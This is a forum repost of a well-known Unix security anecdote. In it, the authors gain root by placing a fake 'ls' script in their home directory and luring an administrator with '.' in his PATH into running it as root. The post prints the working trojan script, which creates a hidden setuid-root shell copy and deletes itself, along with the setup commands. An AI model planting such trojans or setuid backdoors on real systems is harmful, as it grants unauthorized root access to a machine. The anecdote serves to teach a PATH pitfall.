- 论坛徽章:
- 0
|
Stealing Superuser
Once upon a time, many years ago, one of us needed access to the root account on an academic machine. Although we had been authorized by management to have root access, the local system manager didn't want to disclose the password. He asserted that access to the root account
was dangerous (correct), that he had far more knowledge of Unix than we
did (unlikely), and that we didn't need the access (incorrect). After
several diplomatic and bureaucratic attempts to get access normally, we
took a slightly different approach, with management's wry approval.
We noticed that this user had "." at the beginning of his shell search
path. This meant that every time he typed a command name, the shell
would first search the current directory for the command of the same
name. When he did a su to root, this search path was inherited by the new shell. This was all we really needed.
First, we created an executable shell file named ls in the current directory:
CODE:
[Copy to clipboard]
#!/bin/sh
cp /bin/sh ./stuff/junk/.superdude
chmod 4555 ./stuff/junk/.superdude
rm -f $0
exec /bin/ls ${1+"$@"}Then, we executed the following commands:
CODE:
[Copy to clipboard]
% cd
% chmod 700 .
% touch ./-fThe
trap was ready. We approached the recalcitrant administrator with the
complaint, "I have a funny file in my directory I can't seem to
delete." Because the directory was mode 700, he couldn't list the
directory to see the contents. So, he used su to become user root. Then he changed the directory to our home directory and issued the command ls to view the problem file. Instead of the system version of ls, he ran our version. This created a hidden setuid root copy of the shell, deleted the bogus ls command, and ran the real ls command. The administrator never knew what happened.
We listened politely as he explained (superciliously) that files
beginning with a dash character (-) needed to be deleted with a
pathname relative to the current directory (in our case, rm ./-f); of course, we knew that.
A few minutes later, he couldn't get the new root password.
本文来自ChinaUnix博客,如果查看原文请点:http://blog.chinaunix.net/u/19729/showart_118289.html |
|
免费注册
发表于 2006-05-26 09:41